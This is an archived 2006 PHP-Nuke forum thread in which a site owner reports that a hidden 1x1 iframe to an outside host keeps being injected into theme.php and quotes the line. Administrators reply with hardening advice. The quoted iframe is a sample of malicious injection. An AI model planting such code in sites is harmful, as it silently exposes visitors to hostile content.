Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
synaptyx
Hangin' Around


Joined: Jul 20, 2006
Posts: 41

PostPosted: Fri Aug 04, 2006 5:39 am Reply with quote

Someone keeps hacking my theme.php and adding this line in various places.
Code:
<iframe src='http://comrost.com/traffic/index.php' width=1 height=1></iframe>
Any ideas what this is, and how to stop it from recurring.

The latest NukeSentinel isn't stopping it.

Thanks
 
View user's profile Send private message
jakec
Site Admin


Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom

PostPosted: Fri Aug 04, 2006 6:00 am Reply with quote

What version of Nuke are you using?

Do you have any 3rd party modules?


Last edited by jakec on Fri Aug 04, 2006 6:21 am; edited 1 time in total 
View user's profile Send private message
manunkind
Client


Joined: Apr 26, 2004
Posts: 368
Location: Albuquerque, NM

PostPosted: Fri Aug 04, 2006 6:15 am Reply with quote

Is it possible they are doing it through FTP? NukeSentinel won't stop that.

Change your FTP password and see if it stops.

_________________
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6792
Location: Ha Noi, Viet Nam

PostPosted: Fri Aug 04, 2006 6:50 am Reply with quote

If you have no third porty modules or forum hacks that do not allow file uploading, this is worrying.
Make sure your theme.php is CHMOD no higher than 644
 
View user's profile Send private message Send e-mail
Guardian2003
PostPosted: Fri Aug 04, 2006 6:51 am Reply with quote

A link to your site would be useful too!
 
synaptyx
PostPosted: Fri Aug 04, 2006 7:34 am Reply with quote

Hi, using nuke 7.7patched and the latest nukesentinel. There are a few third party modules. Site is at: Only registered users can see links on this board! Get registered or login! I'm not using phpbb at all, but have a seperate install of smf.
 
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

PostPosted: Fri Aug 04, 2006 7:47 am Reply with quote

7.7 REMOVES the security for bad HTML (including iframes) and there's no way NukeSentinel can block that. Don't allow guests to submit news, comments, etc. That would help give you some idea of WHO is attacking.

Also, make sure you put admin authentication on both the admin.php and modules/Forums/admin directory.

Not sure if SMF is secure, but it probably doesn't use standard PHP-Nuke database access methods, which again, NukeSentinel cannot protect.

And follow Guardian's suggestions above.

_________________
I google, therefore I exist...
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
synaptyx
PostPosted: Fri Aug 04, 2006 8:55 am Reply with quote

kguske wrote:
Also, make sure you put admin authentication on both the admin.php and modules/Forums/admin directory.
Thanks for that. Smile
I've implemented the other suggestions, but not sure how I go about this.
 
kguske
PostPosted: Fri Aug 04, 2006 11:50 am Reply with quote

NukeSentinel has instructions for doing this on the admin.php file. You'll need to do it manually for the modules/Forums/admin directory.

Note that this applies to all versions / distributions of Nuke whether or not you have NukeSentinel installed.
 
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9449
Location: Arizona

PostPosted: Sat Aug 05, 2006 7:58 am Reply with quote

Also make sure your site is patched to the latest 3.2b patches from Only registered users can see links on this board! Get registered or login! You are "playing with fire" using 7.7.

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
synaptyx
PostPosted: Mon Aug 07, 2006 3:49 am Reply with quote

montego wrote:
You are "playing with fire" using 7.7.
Taken on board and just migrated to RavenNuke76. Wink
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©